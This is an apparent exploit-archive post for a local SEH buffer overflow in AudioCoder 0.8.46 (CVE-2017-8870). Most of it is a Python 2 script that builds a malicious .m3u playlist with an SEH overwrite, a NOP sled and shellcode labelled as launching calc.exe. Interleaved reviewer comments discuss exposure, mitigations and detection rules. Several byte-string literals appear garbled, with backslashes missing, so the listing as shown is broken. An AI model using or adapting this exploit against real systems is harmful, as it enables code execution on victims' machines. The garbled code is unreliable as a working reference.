
AudioCoder 0.8.46 Local Buffer Overflow

Posted on 01 August 2017

#!/usr/bin/python
# Exploit Title : AudioCoder 0.8.46 Local Buffer Overflow (SEH)
# CVE : CVE-2017-8870
# Exploit Author : Muhann4d @0xSecured
# Vendor Homepage : http://www.mediacoderhq.com
# Vulnerable Software: http://www.mediacoderhq.com/getfile.htm?site=mediatronic.com.au/download&file=AudioCoder-0.8.46.exe
# Vulnerable Version : 0.8.46
# Fixed version : N/A
# Category : Local Buffer Overflow
# Tested on OS : Windows 7 Pro SP1 32bit
# How to : Open AudioCoder then drag & drop the .m3u file in it and then press the START button.
# Timeline :
# 2017-05-05: Vulnerability discovered, vendor has been contacted
# 2017-05-08: Vendor replied denying it .."I believe this was an old issue and no longer exists in the latest version"
# 2017-05-09: A POC sent to the vendor. No reply since then.
# 2017-06-26: Exploit released.
#
# Reviewer notes (triage / defence):
# - Purpose: this proof-of-concept writes a single playlist file, "Exploit.m3u",
#   whose only content is one over-long "http://" entry padded to 2572 bytes.
#   According to the header above, AudioCoder 0.8.46 overflows a local buffer
#   when the user loads that playlist and presses START, and the overflow
#   reaches the structured-exception-handler (SEH) record on the stack.
# - User interaction is required (opening an attacker-supplied .m3u file), so
#   the practical exposure is untrusted playlists arriving by mail, download
#   or shared folders.
# - Mitigation: the header lists no fixed version as of the post date; treat
#   0.8.46 as unpatched unless the vendor states otherwise, and remove or
#   restrict the application where it is not needed. System-wide SEHOP and DEP
#   are the generic Windows hardening measures against SEH-overwrite bugs.
# - Detection: a playlist entry of this length (a URL scheme followed by
#   hundreds of bytes with no separators) is not a plausible URL, so a length
#   check on .m3u entries is a reasonable scanning rule. The payload is
#   labelled by the author as launching calc.exe; alert on the media
#   application spawning unexpected child processes.
# - NOTE(review): this listing is reproduced exactly as extracted; several
#   string literals appear garbled, so it is kept for reference and triage,
#   not as runnable code. The syntax (print statement, raw_input) is Python 2.
print "AudioCoder 0.8.46 Local Buffer Overflow By Muhann4d @0xSecured"
from struct import pack
# Leading filler: a URL scheme followed by 741 repetitions of the filler string.
junk = "http://" + "x41" * 741
# Two little-endian 32-bit values laid over the SEH record (next-record field,
# then handler field). The second is presumably an address inside a module
# loaded by the application - confirm against the tested build.
nseh = pack('<I',0x909006eb)
seh = pack('<I',0x66015926)
# Padding placed between the SEH record and the payload.
nops= "x90" * 20
# Payload bytes; the author's trailing comment identifies it as calc.exe.
shell=("xb8x9dx01x15xd1xdaxd2xd9x74x24xf4x5ax31xc9xb1"
"x32x31x42x12x03x42x12x83x77xfdxf7x24x7bx16x7e"
"xc6x83xe7xe1x4ex66xd6x33x34xe3x4bx84x3exa1x67"
"x6fx12x51xf3x1dxbbx56xb4xa8x9dx59x45x1dx22x35"
"x85x3fxdex47xdax9fxdfx88x2fxe1x18xf4xc0xb3xf1"
"x73x72x24x75xc1x4fx45x59x4exefx3dxdcx90x84xf7"
"xdfxc0x35x83xa8xf8x3excbx08xf9x93x0fx74xb0x98"
"xe4x0ex43x49x35xeex72xb5x9axd1xbbx38xe2x16x7b"
"xa3x91x6cx78x5exa2xb6x03x84x27x2bxa3x4fx9fx8f"
"x52x83x46x5bx58x68x0cx03x7cx6fxc1x3fx78xe4xe4"
"xefx09xbexc2x2bx52x64x6ax6dx3excbx93x6dxe6xb4"
"x31xe5x04xa0x40xa4x42x37xc0xd2x2bx37xdaxdcx1b"
"x50xebx57xf4x27xf4xbdxb1xd8xbex9cx93x70x67x75"
"xa6x1cx98xa3xe4x18x1bx46x94xdex03x23x91x9bx83"
"xdfxebxb4x61xe0x58xb4xa3x83x3fx26x2fx44") #calc.exe
# Trailing filler sized so that the whole entry comes to 2572 bytes.
junkD = "D" * (2572 - (len(junk + nseh + seh + nops + shell)))
exploit = junk + nseh + seh + nops + shell + junkD
# Write the entry to Exploit.m3u in the current directory (text mode), then
# wait for the operator to press Enter. The bare except hides the real cause
# of any failure behind one generic message, and the handle is not closed if
# write() raises.
try:
    file= open("Exploit.m3u",'w')
    file.write(exploit)
    file.close()
    raw_input(" Exploit has been created! 
")
except:
    print "There has been an Error"

 
